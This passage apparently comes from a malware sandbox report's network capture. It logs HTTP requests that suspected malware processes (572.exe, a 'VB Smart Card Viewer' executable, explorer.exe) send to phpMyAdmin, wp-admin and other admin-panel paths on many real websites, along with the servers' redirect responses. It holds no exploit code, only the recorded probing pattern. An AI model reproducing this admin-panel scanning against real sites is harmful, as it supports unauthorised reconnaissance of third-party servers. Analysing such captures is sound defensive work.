                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                542192.168.2.649752195.248.251.103804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.528753042 CET176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: phonandroid.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.742680073 CET223INHTTP/1.1 301 Permanently moved
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                X-Varnish: 13616688
                                                                                                                                                                                                                                                                                                                                                                X-Redirected-By: lxc-varnish-ressources-01
                                                                                                                                                                                                                                                                                                                                                                Location: https://www.phonandroid.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                543192.168.2.6498103.141.96.53804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.528887033 CET217OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: https://money-farm.cc/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.651449919 CET147INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                544192.168.2.64988134.149.46.13080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.528994083 CET176OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.631637096 CET205INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/admin
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                545192.168.2.64975482.221.28.171804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.545109987 CET166OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: uh.is
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.779031992 CET529INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=60
                                                                                                                                                                                                                                                                                                                                                                Location: https://uh.is/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex, nofollow, nosnippet, noarchive
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                546192.168.2.649889195.85.23.9580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.552294970 CET172OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.775516033 CET756INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/admin
                                                                                                                                                                                                                                                                                                                                                                x-bc: ded7160
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-reserve101-ded7160
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=NZswYeQ9Yu7K9JcgvzK4LmoL_0TST4ve7RnZaydD5ic-1707131772-1-Ab4rNABlIeBJEAeRFX16kvHDLRPbDvXG6xV0NJ9evJ6Oi/BiIUIPdZoJZ/mYFBfKpixlKrbGtITCrQfyx9t7OTw=; path=/; expires=Mon, 05-Feb-24 11:46:12 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6acfb353cf-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                547192.168.2.649891142.250.105.8480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.558478117 CET173OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.691452980 CET478INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.691468954 CET178INData Raw: 1f 8b 08 00 00 00 00 00 00 ff 6d 8f c1 0a 83 30 10 44 ef 7e 45 48 ef a6 bd 96 18 d0 1a 6b 41 11 24 87 f6 18 e2 62 0a c6 48 8c 85 fe 7d 63 da 63 e7 b2 ec ec 30 bc a5 b5 68 1b 96 d0 9a e7 65 18 e2 26 1a ce 5a fb 82 01 09 30 8b 75 d2 3d a7 37 25 df
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m0D~EHkA$bH}cc0he&Z0u=7%CB/XtKt}UFEXQx=kn"4+21GsT~YH65'H5d1`%9K;


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                548192.168.2.649784201.134.41.61804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.561821938 CET180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.723751068 CET572INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 342
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 2f 61 63 61 64 65 6d 69 63 6f 2f 50 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/PhpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                549192.168.2.649890138.197.59.19980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.577724934 CET177OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.699147940 CET550INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/pma/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 333
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/pma/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                550192.168.2.64981154.183.63.241804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.580295086 CET174OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.761522055 CET759INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=3cfcf3297704242d99b2d5fe10204f22; expires=Mon, 04 Mar 2024 11:16:12 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=3cfcf3297704242d99b2d5fe10204f22; expires=Mon, 04 Mar 2024 11:16:12 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: G4Ews4zi5F5r5dXKCGns
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 14
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.761569023 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                551192.168.2.64990613.249.120.480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.582818031 CET165OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: tiktok.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.684576035 CET565INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://tiktok.com/admin
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 d2c82a47dca9b567464b4d0c63ebebc8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL51-C1
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: DysLBB5ey-HXTd_EC2Zb0BuOsIq73GVXTD_vJEX-paSsXYJV8spp2Q==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                552192.168.2.6499093.161.150.6980524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.585573912 CET178OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.688502073 CET578INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 3e445414cb8134bf4b609fdcfe022fcc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: Kpi2UXU9lZl222oThyEyBGv7OH6dtuAn_0ZqYsgzB16VdkBi2bATcQ==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                553192.168.2.649904104.22.74.22080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.597103119 CET167OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
